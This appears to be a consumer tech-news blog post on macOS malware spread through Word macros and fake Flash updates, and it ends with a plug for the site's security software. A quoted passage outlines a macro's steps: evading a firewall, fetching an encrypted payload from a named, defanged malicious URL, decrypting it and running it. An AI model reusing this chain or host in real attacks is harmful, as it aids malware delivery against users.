New macOS malware exploits old Windows tricks to get into your system.
One of the many things that Apple devotees tout about their preferred technology is the perceived lack of malicious software targeting various operating systems in their biosphere. Whether it’s for Mac or the mobile App Store, the Cupertino company’s strict control over who can write and sell for their hardware has admittedly kept the number of viruses – and just plain lousy software or app – to a minimum.
But a new threat to the MacOS proves that it can be done, and that the best way to infect an Apple device is to pretend it’s running Windows. Two new viruses discovered to target MacOS machines are relying on old favorites like Word macros and phony software updates to spread malicious code, mechanisms that Windows users have long been warned about.
Macro-based attacks actually fell out of favor some time ago, due to growing consumer awareness that opening attachments in emails could
destroy everything you love potentially harm your computer. Around the same time, emailed links that downloaded viruses proved more effective and more trustworthy. As an added behavior benefit, getting your hapless victim to click a link was also easier than convincing them to open a slower attachment.
But now that the warnings against clicking unexpected links have made headway – and now that a younger generation of users who weren’t schooled in the “never open an attachment” line of thinking has grown up – hackers are back to deploying viruses and other malware through macros. It’s believed a macro-based attack was responsible for a large-scale power grid takedown in 2015.
Security researchers have now identified what might be the first known Mac-based attack that relies on this old Windows standby. According to an article from Ars Technica, “The attack was found in a Word file titled ‘U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.’ When Mac users open the document in a Word application configured to allow macros and ignore a warning, an embedded macro automatically:
- checks to make sure the LittleSnitch security firewall isn’t running
- downloads an encrypted payload from hxxps://www.securitychecking.org:443/index.asp
- decrypts the payload using a hard-coded key and
- executes the payload
The Next Web also highlighted another form of attack that was once only a headache for Windows users, and that’s the fake download of otherwise important software. A popup box warning you to click here to update your Adobe Flash Player, for example, was actually installing malicious code. This type of attack has already been discovered affecting MacOS systems.
Here at FileHippo we have the very latest Mac and PC security and anti-virus software available for you to download now!